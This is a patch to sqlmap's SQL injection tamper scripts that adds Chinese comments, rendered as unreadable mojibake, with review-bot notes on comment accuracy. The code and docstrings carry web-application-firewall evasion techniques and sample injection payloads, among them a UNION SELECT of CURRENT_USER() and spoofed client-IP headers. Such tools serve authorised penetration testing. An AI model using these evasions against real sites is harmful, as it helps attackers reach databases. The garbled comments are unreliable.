@@ -16,30 +16,35 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces greater than operator ('>') with 'LEAST' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢澶т簬鎿嶄綔绗︼紙'>')鏇挎崲涓'LEAST'鍑芥暟鐨勭瓑鏁堝舰寮忋 - Tested against: - * MySQL 4, 5.0 and 5.5 + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 娴嬭瘯鎯呭喌锛 + * MySQL 4, 5.0 鍜 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the greater than character - * The LEAST clause is a widespread SQL command. Hence, this - tamper script should work against majority of databases + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺杩囨护澶т簬瀛楃锛'>')鐨勫急Web搴旂敤闃茬伀澧欏緢鏈夌敤銆 + * LEAST鍑芥暟鏄竴涓箍娉涗娇鐢ㄧ殑SQL鍛戒护銆傚洜姝わ紝杩欎釜tamper鑴氭湰搴旇閫傜敤浜庡ぇ澶氭暟鏁版嵁搴撱 - >>> tamper('1 AND A > B') - '1 AND LEAST(A,B+1)=B+1' + 绀轰緥锛 + >>> tamper('1 AND A > B') + '1 AND LEAST(A,B+1)=B+1' """ retVal = payload - if payload: + if payload: # 濡傛灉payload涓嶄负绌 + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵'A > B'褰㈠紡鐨勮鍙 match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload) - if match: + if match: # 濡傛灉鎵惧埌鍖归厤椤 + # 鏋勯燣EAST鍑芥暟褰㈠紡鐨勮鍙ワ紝骞舵浛鎹㈠師璇彞 _ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4)) - retVal = retVal.replace(match.group(0), _) + retVal = retVal.replace(match.group(0), _) # 鏇挎崲鍘熻鍙ヤ负LEAST鍑芥暟褰㈠紡 return retVal diff --git a/src/sqlmap-master/tamper/lowercase.py b/src/sqlmap-master/tamper/lowercase.py index 230f7ef..adfab06 100644 --- a/src/sqlmap-master/tamper/lowercase.py +++ b/src/sqlmap-master/tamper/lowercase.py 
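Review bot: The comment on `retVal = retVal.replace(match.group(0), _)` reads like a plain rewrite, but `re.search` locates only the first `AND/OR ... > ...` comparison and `str.replace` then substitutes every identical occurrence of that text, so a payload with two different `>` comparisons keeps the second one unchanged. A comment on that line such as `# only the first '>' comparison is found; str.replace() then rewrites every identical occurrence of it` would stop a maintainer from assuming all comparisons are covered. The docstring retains the original doctest, which is good.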
@@ -5,11 +5,12 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import re +import re # 瀵煎叆姝e垯琛ㄨ揪寮忔ā鍧楋紝鐢ㄤ簬鍖归厤瀛楃涓蹭腑鐨勬ā寮 -from lib.core.data import kb -from lib.core.enums import PRIORITY +from lib.core.data import kb # 浠庢牳蹇冨簱瀵煎叆鐭ヨ瘑搴擄紝鍖呭惈SQL鍏抽敭瀛楃瓑淇℃伅 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏅 __priority__ = PRIORITY.NORMAL def dependencies(): @@ -17,28 +18,34 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces each keyword character with lower case value (e.g. SELECT -> select) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鍏朵腑鐨勫叧閿瓧瀛楃杞崲涓哄皬鍐欏舰寮忥紙渚嬪锛'SELECT' -> 'select'锛夈 - Tested against: + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 娴嬭瘯鎯呭喌锛 * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 + * MySQL 4, 5.0 鍜 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that has poorly written permissive regular expressions + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺鍏锋湁鍐欏緱涓嶅ソ鐨勫厑璁告鍒欒〃杈惧紡鐨勯潪甯稿急鐨勫畾鍒禬eb搴旂敤闃茬伀澧欏緢鏈夌敤銆 - >>> tamper('INSERT') - 'insert' + 绀轰緥锛 + >>> tamper('INSERT') + 'insert' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload - if payload: - for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): - word = match.group() + if payload: # 濡傛灉payload涓嶄负绌 + # 閬嶅巻payload涓墍鏈夊尮閰嶅崟璇嶈竟鐣岀殑瀛楁瘝鎴栦笅鍒掔嚎妯″紡鐨勫瓧绗︿覆 + for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): + word = match.group() # 鑾峰彇鍖归厤鐨勫崟璇 + # 濡傛灉鍖归厤鐨勫崟璇嶆槸SQL鍏抽敭瀛楋紝鍒欏皢鍏惰浆鎹负灏忓啓 if word.upper() in kb.keywords: retVal = retVal.replace(word, word.lower()) diff --git a/src/sqlmap-master/tamper/luanginx.py b/src/sqlmap-master/tamper/luanginx.py index f4bf825..ee3fe76 100644 --- a/src/sqlmap-master/tamper/luanginx.py +++ b/src/sqlmap-master/tamper/luanginx.py 
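Review bot: The comment before `if word.upper() in kb.keywords:` describes lowercasing "the matched word", but `retVal.replace(word, word.lower())` rewrites every occurrence of that token in the whole payload, not the one at `match.span()`, including occurrences inside longer identifiers and quoted strings (if `OR` is a keyword, `'WORLD'` becomes `'WorLD'`). Note this on the `replace` line, e.g. `# str.replace() rewrites every occurrence of the token, not only this match — also inside longer words and quoted strings`. The uppercase.py hunk later in this patch has the identical construct and deserves the same note.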
@@ -5,13 +5,13 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import random -import string +import random # 瀵煎叆闅忔満鏁版ā鍧楋紝鐢ㄤ簬鐢熸垚闅忔満瀛楃涓 +import string # 瀵煎叆瀛楃涓叉ā鍧楋紝鐢ㄤ簬璁块棶瀛楃涓插父閲 -from lib.core.compat import xrange -from lib.core.enums import HINT -from lib.core.enums import PRIORITY -from lib.core.settings import DEFAULT_GET_POST_DELIMITER +from lib.core.compat import xrange # 瀵煎叆鍏煎搴撲腑鐨剎range鍑芥暟锛岀敤浜庡吋瀹筆ython 2鍜3鐨剅ange鍑芥暟 +from lib.core.enums import HINT # 浠庢牳蹇冨簱瀵煎叆鏋氫妇绫诲瀷 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +from lib.core.settings import DEFAULT_GET_POST_DELIMITER # 浠庢牳蹇冭缃鍏ラ粯璁ょ殑GET/POST鍙傛暟鍒嗛殧绗 __priority__ = PRIORITY.NORMAL 
@@ -29,8 +29,10 @@ def tamper(payload, **kwargs): '34=&Xe=&90=&Ni=&rW=&lc=&te=&T4=&zO=&NY=&B4=&hM=&X2=&pU=&D8=&hm=&p0=&7y=&18=&RK=&Xi=&5M=&vM=&hO=&bg=&5c=&b8=&dE=&7I=&5I=&90=&R2=&BK=&bY=&p4=&lu=&po=&Vq=&bY=&3c=&ps=&Xu=&lK=&3Q=&7s=&pq=&1E=&rM=&FG=&vG=&Xy=&tQ=&lm=&rO=&pO=&rO=&1M=&vy=&La=&xW=&f8=&du=&94=&vE=&9q=&bE=&lQ=&JS=&NQ=&fE=&RO=&FI=&zm=&5A=&lE=&DK=&x8=&RQ=&Xw=&LY=&5S=&zi=&Js=&la=&3I=&r8=&re=&Xe=&5A=&3w=&vs=&zQ=&1Q=&HW=&Bw=&Xk=&LU=&Lk=&1E=&Nw=&pm=&ns=&zO=&xq=&7k=&v4=&F6=&Pi=&vo=&zY=&vk=&3w=&tU=&nW=&TG=&NM=&9U=&p4=&9A=&T8=&Xu=&xa=&Jk=&nq=&La=&lo=&zW=&xS=&v0=&Z4=&vi=&Pu=&jK=&DE=&72=&fU=&DW=&1g=&RU=&Hi=&li=&R8=&dC=&nI=&9A=&tq=&1w=&7u=&rg=&pa=&7c=&zk=&rO=&xy=&ZA=&1K=&ha=&tE=&RC=&3m=&r2=&Vc=&B6=&9A=&Pk=&Pi=&zy=&lI=&pu=&re=&vS=&zk=&RE=&xS=&Fs=&x8=&Fe=&rk=&Fi=&Tm=&fA=&Zu=&DS=&No=&lm=&lu=&li=&jC=&Do=&Tw=&xo=&zQ=&nO=&ng=&nC=&PS=&fU=&Lc=&Za=&Ta=&1y=&lw=&pA=&ZW=&nw=&pM=&pa=&Rk=&lE=&5c=&T4=&Vs=&7W=&Jm=&xG=&nC=&Js=&xM=&Rg=&zC=&Dq=&VA=&Vy=&9o=&7o=&Fk=&Ta=&Fq=&9y=&vq=&rW=&X4=&1W=&hI=&nA=&hs=&He=&No=&vy=&9C=&ZU=&t6=&1U=&1Q=&Do=&bk=&7G=&nA=&VE=&F0=&BO=&l2=&BO=&7o=&zq=&B4=&fA=&lI=&Xy=&Ji=&lk=&7M=&JG=&Be=&ts=&36=&tW=&fG=&T4=&vM=&hG=&tO=&VO=&9m=&Rm=&LA=&5K=&FY=&HW=&7Q=&t0=&3I=&Du=&Xc=&BS=&N0=&x4=&fq=&jI=&Ze=&TQ=&5i=&T2=&FQ=&VI=&Te=&Hq=&fw=&LI=&Xq=&LC=&B0=&h6=&TY=&HG=&Hw=&dK=&ru=&3k=&JQ=&5g=&9s=&HQ=&vY=&1S=&ta=&bq=&1u=&9i=&DM=&DA=&TG=&vQ=&Nu=&RK=&da=&56=&nm=&vE=&Fg=&jY=&t0=&DG=&9o=&PE=&da=&D4=&VE=&po=&nm=&lW=&X0=&BY=&NK=&pY=&5Q=&jw=&r0=&FM=&lU=&da=&ls=&Lg=&D8=&B8=&FW=&3M=&zy=&ho=&Dc=&HW=&7E=&bM=&Re=&jk=&Xe=&JC=&vs=&Ny=&D4=&fA=&DM=&1o=&9w=&3C=&Rw=&Vc=&Ro=&PK=&rw=&Re=&54=&xK=&VK=&1O=&1U=&vg=&Ls=&xq=&NA=&zU=&di=&BS=&pK=&bW=&Vq=&BC=&l6=&34=&PE=&JG=&TA=&NU=&hi=&T0=&Rs=&fw=&FQ=&NQ=&Dq=&Dm=&1w=&PC=&j2=&r6=&re=&t2=&Ry=&h2=&9m=&nw=&X4=&vI=&rY=&1K=&7m=&7g=&J8=&Pm=&RO=&7A=&fO=&1w=&1g=&7U=&7Y=&hQ=&FC=&vu=&Lw=&5I=&t0=&Na=&vk=&Te=&5S=&ZM=&Xs=&Vg=&tE=&J2=&Ts=&Dm=&Ry=&FC=&7i=&h8=&3y=&zk=&5G=&NC=&Pq=&ds=&zK=&d8=&zU=&1a=&d8=&Js=&nk=&TQ=&tC=&n8=&Hc=&Ru=&H0=&Bo=&XE=&Jm=&xK=&r2=&Fu=&FO=&NO=&7g=&PC=&Bq=&3
O=&FQ=&1o=&5G=&zS=&Ps=&j0=&b0=&RM=&DQ=&RQ=&zY=&nk=&1 AND 2>1' """ - hints = kwargs.get("hints", {}) - delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER) + hints = kwargs.get("hints", {}) # 浠巏wargs涓幏鍙杊ints瀛楀吀锛岃嫢涓嶅瓨鍦ㄥ垯鍒濆鍖栦负绌哄瓧鍏 + delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER) # 浠巏wargs涓幏鍙杁elimiter锛岃嫢涓嶅瓨鍦ㄥ垯浣跨敤榛樿鐨凣ET/POST鍙傛暟鍒嗛殧绗 + +# 鐢熸垚澶ч噺闅忔満鍙傛暟骞舵坊鍔犲埌hints[HINT.PREPEND]涓紝鐢ㄤ簬缁曡繃WAF hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.ascii_letters + string.digits, 2)) for _ in xrange(500)) diff --git a/src/sqlmap-master/tamper/space2plus.py b/src/sqlmap-master/tamper/space2plus.py index 45110ae..88a338d 100644 --- a/src/sqlmap-master/tamper/space2plus.py +++ b/src/sqlmap-master/tamper/space2plus.py @@ -5,11 +5,14 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ +# 瀵煎叆xrange鍜孭RIORITY from lib.core.compat import xrange from lib.core.enums import PRIORITY +# 瀹氫箟浼樺厛绾т负LOW __priority__ = PRIORITY.LOW +# 瀹氫箟渚濊禆鍑芥暟 def dependencies(): pass @@ -27,27 +30,35 @@ def tamper(payload, **kwargs): retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: retVal = "" quote, doublequote, firstspace = False, False, False + # 閬嶅巻payload鐨勬瘡涓瓧绗 for i in xrange(len(payload)): + # 濡傛灉绗竴涓瓧绗︿笉鏄┖鏍 if not firstspace: + # 濡傛灉褰撳墠瀛楃鏄┖鏍 if payload[i].isspace(): firstspace = True retVal += "+" continue + # 濡傛灉褰撳墠瀛楃鏄崟寮曞彿 elif payload[i] == '\'': quote = not quote + # 濡傛灉褰撳墠瀛楃鏄弻寮曞彿 elif payload[i] == '"': doublequote = not doublequote + # 濡傛灉褰撳墠瀛楃鏄┖鏍硷紝骞朵笖涓嶅湪鍙屽紩鍙峰拰鍗曞紩鍙蜂腑 elif payload[i] == " " and not doublequote and not quote: retVal += "+" continue + # 灏嗗綋鍓嶅瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] return retVal diff --git a/src/sqlmap-master/tamper/space2randomblank.py b/src/sqlmap-master/tamper/space2randomblank.py index 2a2cc4d..cac06ad 100644 --- a/src/sqlmap-master/tamper/space2randomblank.py +++ b/src/sqlmap-master/tamper/space2randomblank.py 
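Review bot: The added `# 鐢熸垚澶ч噺闅忔満鍙傛暟...` comment sits at column 0 inside the body of `tamper()`, directly above the indented `hints[HINT.PREPEND] = ...` assignment; Python ignores comment indentation, but a column-0 line in a function body breaks the visual structure and most linters flag it. Indent it to the body level and, given its mojibake encoding, re-save it as UTF-8 like the rest of the series. The body of `tamper()` appears to continue past the end of this hunk.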
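Review bot: The comment added above `if not firstspace:` (decoded from the mojibake it reads roughly "if the first character is not a space") misdescribes the flag: `firstspace` records whether the first whitespace has already been replaced, and until then any `isspace()` character (tab, newline) is turned into `+`, whereas afterwards only a literal `' '` outside quotes is. Something like `# until the first whitespace has been replaced, any whitespace char counts; after that only a bare ' ' outside quotes does` would be accurate. The same comment, with the same issue, is added in the space2randomblank.py hunk that follows.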
@@ -38,30 +38,50 @@ def tamper(payload, **kwargs): # LF 0A new line # FF 0C new page # CR 0D carriage return + # 瀹氫箟涓涓寘鍚壒娈婂瓧绗︾殑鍒楄〃 blanks = ("%09", "%0A", "%0C", "%0D") + # 灏唒ayload璧嬪肩粰retVal retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: + # 灏唕etVal缃负绌哄瓧绗︿覆 retVal = "" + # 瀹氫箟涓変釜甯冨皵鍙橀噺锛屽垎鍒〃绀烘槸鍚﹀湪寮曞彿鍐呫佸弻寮曞彿鍐呭拰绗竴涓┖鏍 quote, doublequote, firstspace = False, False, False + # 閬嶅巻payload鐨勬瘡涓瓧绗 for i in xrange(len(payload)): + # 濡傛灉绗竴涓瓧绗︿笉鏄┖鏍 if not firstspace: + # 濡傛灉褰撳墠瀛楃鏄┖鏍 if payload[i].isspace(): + # 灏唂irstspace缃负True firstspace = True + # 鍦╮etVal涓坊鍔犱竴涓殢鏈洪夋嫨鐨勭壒娈婂瓧绗 retVal += random.choice(blanks) + # 缁х画涓嬩竴娆″惊鐜 continue + # 濡傛灉褰撳墠瀛楃鏄崟寮曞彿 elif payload[i] == '\'': + # 灏唓uote鍙栧弽 quote = not quote + # 濡傛灉褰撳墠瀛楃鏄弻寮曞彿 elif payload[i] == '"': + # 灏哾oublequote鍙栧弽 doublequote = not doublequote + # 濡傛灉褰撳墠瀛楃鏄┖鏍硷紝涓斾笉鍦ㄥ弻寮曞彿鍜屽崟寮曞彿鍐 elif payload[i] == ' ' and not doublequote and not quote: + # 鍦╮etVal涓坊鍔犱竴涓殢鏈洪夋嫨鐨勭壒娈婂瓧绗 retVal += random.choice(blanks) + # 缁х画涓嬩竴娆″惊鐜 continue + # 灏嗗綋鍓嶅瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] + # 杩斿洖retVal return retVal diff --git a/src/sqlmap-master/tamper/substring2leftright.py b/src/sqlmap-master/tamper/substring2leftright.py index 642e499..d993050 100644 --- a/src/sqlmap-master/tamper/substring2leftright.py +++ b/src/sqlmap-master/tamper/substring2leftright.py @@ -32,16 +32,26 @@ def tamper(payload, **kwargs): retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: + # 鍦╬ayload涓煡鎵維UBSTRING鍑芥暟 match = re.search(r"SUBSTRING\((.+?)\s+FROM[^)]+(\d+)[^)]+FOR[^)]+1\)", payload) + # 濡傛灉鎵惧埌浜哠UBSTRING鍑芥暟 if match: + # 鑾峰彇SUBSTRING鍑芥暟涓殑浣嶇疆鍙傛暟 pos = int(match.group(2)) + # 濡傛灉浣嶇疆鍙傛暟涓1 if pos == 1: + # 灏哠UBSTRING鍑芥暟鏇挎崲涓篖EFT鍑芥暟 _ = "LEFT(%s,1)" % (match.group(1)) + # 鍚﹀垯 else: + # 灏哠UBSTRING鍑芥暟鏇挎崲涓篟IGHT鍜孡EFT鍑芥暟鐨勭粍鍚 _ = "LEFT(RIGHT(%s,%d),1)" % (match.group(1), 1 - pos) + # 灏嗘浛鎹㈠悗鐨勫嚱鏁版浛鎹㈠洖payload涓 retVal = retVal.replace(match.group(0), _) + # 杩斿洖鏇挎崲鍚庣殑payload return retVal 
diff --git a/src/sqlmap-master/tamper/symboliclogical.py b/src/sqlmap-master/tamper/symboliclogical.py index f33e09c..8cc03e0 100644 --- a/src/sqlmap-master/tamper/symboliclogical.py +++ b/src/sqlmap-master/tamper/symboliclogical.py @@ -5,12 +5,16 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ +# 瀵煎叆姝e垯琛ㄨ揪寮忔ā鍧 import re +# 浠巐ib.core.enums妯″潡涓鍏RIORITY鏋氫妇 from lib.core.enums import PRIORITY +# 瀹氫箟鏈浣庝紭鍏堢骇 __priority__ = PRIORITY.LOWEST +# 瀹氫箟渚濊禆鍑芥暟 def dependencies(): pass @@ -24,6 +28,7 @@ def tamper(payload, **kwargs): retVal = payload + # 濡傛灉payload涓嶄负绌猴紝鍒欏皢payload涓殑AND鏇挎崲涓%26%26锛屽皢OR鏇挎崲涓%7C%7C if payload: retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload)) diff --git a/src/sqlmap-master/tamper/unionalltounion.py b/src/sqlmap-master/tamper/unionalltounion.py index 1c1ae21..d56b8a3 100644 --- a/src/sqlmap-master/tamper/unionalltounion.py +++ b/src/sqlmap-master/tamper/unionalltounion.py @@ -7,11 +7,14 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST +# 瀹氫箟渚濊禆鍑芥暟 def dependencies(): pass +# 瀹氫箟tamper鍑芥暟锛岀敤浜庢浛鎹ayload涓殑UNION ALL SELECT涓篣NION SELECT def tamper(payload, **kwargs): """ Replaces instances of UNION ALL SELECT with UNION SELECT counterpart @@ -20,4 +23,5 @@ def tamper(payload, **kwargs): '-1 UNION SELECT' """ + # 濡傛灉payload瀛樺湪锛屽垯鏇挎崲鍏朵腑鐨刄NION ALL SELECT涓篣NION SELECT return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload diff --git a/src/sqlmap-master/tamper/unmagicquotes.py b/src/sqlmap-master/tamper/unmagicquotes.py index 89e9b96..6e19576 100644 --- a/src/sqlmap-master/tamper/unmagicquotes.py +++ b/src/sqlmap-master/tamper/unmagicquotes.py 
@@ -31,23 +31,38 @@ def tamper(payload, **kwargs): retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: found = False retVal = "" + # 閬嶅巻payload涓殑姣忎釜瀛楃 for i in xrange(len(payload)): + # 濡傛灉瀛楃涓哄崟寮曞彿涓攆ound涓篎alse if payload[i] == '\'' and not found: + # 灏%bf%27娣诲姞鍒皉etVal涓 retVal += "%bf%27" + # 灏唂ound璁剧疆涓篢rue found = True else: + # 灏嗗瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] + # 缁х画寰幆 continue + # 濡傛灉found涓篢rue if found: + # 浣跨敤姝e垯琛ㄨ揪寮忔浛鎹etVal涓殑鍐呭 _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal) + # 濡傛灉鏇挎崲鍚庣殑鍐呭涓巖etVal涓嶅悓 if _ != retVal: + # 灏嗘浛鎹㈠悗鐨勫唴瀹硅祴鍊肩粰retVal retVal = _ + # 灏-- -娣诲姞鍒皉etVal涓 retVal += "-- -" + # 濡傛灉retVal涓笉鍖呭惈#銆--銆/*涓殑浠绘剰涓涓 elif not any(_ in retVal for _ in ('#', '--', '/*')): + # 灏-- -娣诲姞鍒皉etVal涓 retVal += "-- -" + # 杩斿洖retVal return retVal diff --git a/src/sqlmap-master/tamper/uppercase.py b/src/sqlmap-master/tamper/uppercase.py index ad27404..5e223bc 100644 --- a/src/sqlmap-master/tamper/uppercase.py +++ b/src/sqlmap-master/tamper/uppercase.py @@ -36,11 +36,17 @@ def tamper(payload, **kwargs): retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: + # 鍦╮etVal涓煡鎵炬墍鏈夊尮閰峓A-Za-z_]鐨勬鍒欒〃杈惧紡 for match in re.finditer(r"[A-Za-z_]+", retVal): + # 鑾峰彇鍖归厤鐨勫崟璇 word = match.group() + # 濡傛灉鍗曡瘝鐨勫ぇ鍐欏舰寮忓湪kb.keywords涓 if word.upper() in kb.keywords: + # 灏唕etVal涓殑鍗曡瘝鏇挎崲涓哄ぇ鍐欏舰寮 retVal = retVal.replace(word, word.upper()) + # 杩斿洖retVal return retVal diff --git a/src/sqlmap-master/tamper/varnish.py b/src/sqlmap-master/tamper/varnish.py index 0e0add6..a0e8cae 100644 --- a/src/sqlmap-master/tamper/varnish.py +++ b/src/sqlmap-master/tamper/varnish.py @@ -28,6 +28,9 @@ def tamper(payload, **kwargs): >> X-remote-IP: * or %00 or %0A """ + # 鑾峰彇kwargs瀛楀吀涓殑headers閿搴旂殑鍊硷紝濡傛灉涓嶅瓨鍦ㄥ垯杩斿洖绌哄瓧鍏 headers = kwargs.get("headers", {}) + # 鍦╤eaders瀛楀吀涓坊鍔燲-originating-IP閿紝鍊间负127.0.0.1 headers["X-originating-IP"] = "127.0.0.1" + # 杩斿洖payload return payload 
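Review bot: The new `# 缁х画寰幆` ("continue the loop") comment annotates a `continue` that is the last statement of the `for` body, so it is a no-op; documenting it as if it did something will mislead the next reader. Either delete the `continue` or mark it honestly, e.g. `# no-op: already the last statement of the loop body`. Separately, the comment on the `re.sub` line only says that a regex replaces something; stating what it does — strip an `AND x=x` / `OR x LIKE x` clause (the `\2` backreference) from the rewritten payload before `-- -` is appended — is what a reader needs.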
diff --git a/src/sqlmap-master/tamper/versionedkeywords.py b/src/sqlmap-master/tamper/versionedkeywords.py index 6914ade..6a8781b 100644 --- a/src/sqlmap-master/tamper/versionedkeywords.py +++ b/src/sqlmap-master/tamper/versionedkeywords.py @@ -36,17 +36,26 @@ def tamper(payload, **kwargs): '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#' """ + # 瀹氫箟涓涓嚱鏁帮紝鐢ㄤ簬澶勭悊鍖归厤鍒扮殑鍗曡瘝 def process(match): + # 鑾峰彇鍖归厤鍒扮殑鍗曡瘝 word = match.group('word') + # 濡傛灉鍗曡瘝鐨勫ぇ鍐欏舰寮忓湪鍏抽敭璇嶅垪琛ㄤ腑 if word.upper() in kb.keywords: + # 灏嗗尮閰嶅埌鐨勫崟璇嶆浛鎹负/*!鍗曡瘝*/ return match.group().replace(word, "/*!%s*/" % word) else: + # 鍚﹀垯锛岃繑鍥炲尮閰嶅埌鐨勫崟璇 return match.group() + # 灏唒ayload璧嬪肩粰retVal retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忓尮閰嶅崟璇嶏紝骞惰皟鐢╬rocess鍑芥暟杩涜澶勭悊 retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=[^\w(]|\Z)", process, retVal) + # 灏" /*!"鏇挎崲涓"/*!"锛屽皢"*/ "鏇挎崲涓"*/" retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/") return retVal diff --git a/src/sqlmap-master/tamper/versionedmorekeywords.py b/src/sqlmap-master/tamper/versionedmorekeywords.py index fe3480e..b160406 100644 --- a/src/sqlmap-master/tamper/versionedmorekeywords.py +++ b/src/sqlmap-master/tamper/versionedmorekeywords.py 
@@ -37,17 +37,27 @@ def tamper(payload, **kwargs): '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#' """ + # 瀹氫箟涓涓嚱鏁帮紝鐢ㄤ簬澶勭悊鍖归厤鍒扮殑鍗曡瘝 def process(match): + # 鑾峰彇鍖归厤鍒扮殑鍗曡瘝 word = match.group('word') + # 濡傛灉鍗曡瘝鐨勫ぇ鍐欏舰寮忓湪鍏抽敭璇嶅垪琛ㄤ腑锛屽苟涓斾笉鍦ㄥ拷鐣ョ┖鏍煎奖鍝嶇殑鍏抽敭璇嶅垪琛ㄤ腑 if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: + # 灏嗗尮閰嶅埌鐨勫崟璇嶆浛鎹负/*!鍗曡瘝*/ return match.group().replace(word, "/*!%s*/" % word) else: + # 鍚﹀垯锛岃繑鍥炲尮閰嶅埌鐨勫崟璇 return match.group() + # 灏唒ayload璧嬪肩粰retVal retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忓尮閰嶅崟璇嶏紝骞惰皟鐢╬rocess鍑芥暟杩涜澶勭悊 retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", process, retVal) + # 灏" /*!"鏇挎崲涓"/*!"锛屽皢"*/ "鏇挎崲涓"*/" retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/") + # 杩斿洖retVal return retVal diff --git a/src/sqlmap-master/tamper/xforwardedfor.py b/src/sqlmap-master/tamper/xforwardedfor.py index b1d2892..a222dbc 100644 --- a/src/sqlmap-master/tamper/xforwardedfor.py +++ b/src/sqlmap-master/tamper/xforwardedfor.py @@ -16,11 +16,16 @@ def dependencies(): pass def randomIP(): + """ + 鐢熸垚涓涓殢鏈虹殑IP鍦板潃 + """ octets = [] + # 鐢熸垚涓涓殢鏈虹殑IP鍦板潃锛屾帓闄10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16杩欎笁涓鏈塈P鍦板潃娈 while not octets or octets[0] in (10, 172, 192): octets = random.sample(xrange(1, 255), 4) + # 灏嗙敓鎴愮殑IP鍦板潃娈佃繛鎺ユ垚涓涓瓧绗︿覆 return '.'.join(str(_) for _ in octets) def tamper(payload, **kwargs): @@ -28,7 +33,9 @@ def tamper(payload, **kwargs): Append a fake HTTP header 'X-Forwarded-For' (and alike) """ + # 鑾峰彇浼犲叆鐨刪eaders鍙傛暟锛屽鏋滄病鏈夊垯鍒涘缓涓涓┖瀛楀吀 headers = kwargs.get("headers", {}) + # 鐢熸垚涓涓殢鏈虹殑IP鍦板潃锛屽苟灏嗗叾娣诲姞鍒癶eaders涓 headers["X-Forwarded-For"] = randomIP() headers["X-Client-Ip"] = randomIP() headers["X-Real-Ip"] = randomIP() 
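Review bot: The comment added to `randomIP()` (roughly "excluding the 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16 private ranges", as far as the mojibake decodes) claims more precision than the code has: the loop rejects any first octet of 10, 172 or 192, i.e. the whole of 172/8 and 192/8, while 127/8 and the 224–239 multicast block are never rejected. Also, `random.sample(xrange(1, 255), 4)` draws without replacement, so the four octets are always distinct. A comment such as `# reject first octets 10, 172, 192 (coarser than RFC 1918); 127/8 and multicast are not filtered; sample() gives 4 distinct octets` would describe the actual behaviour.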
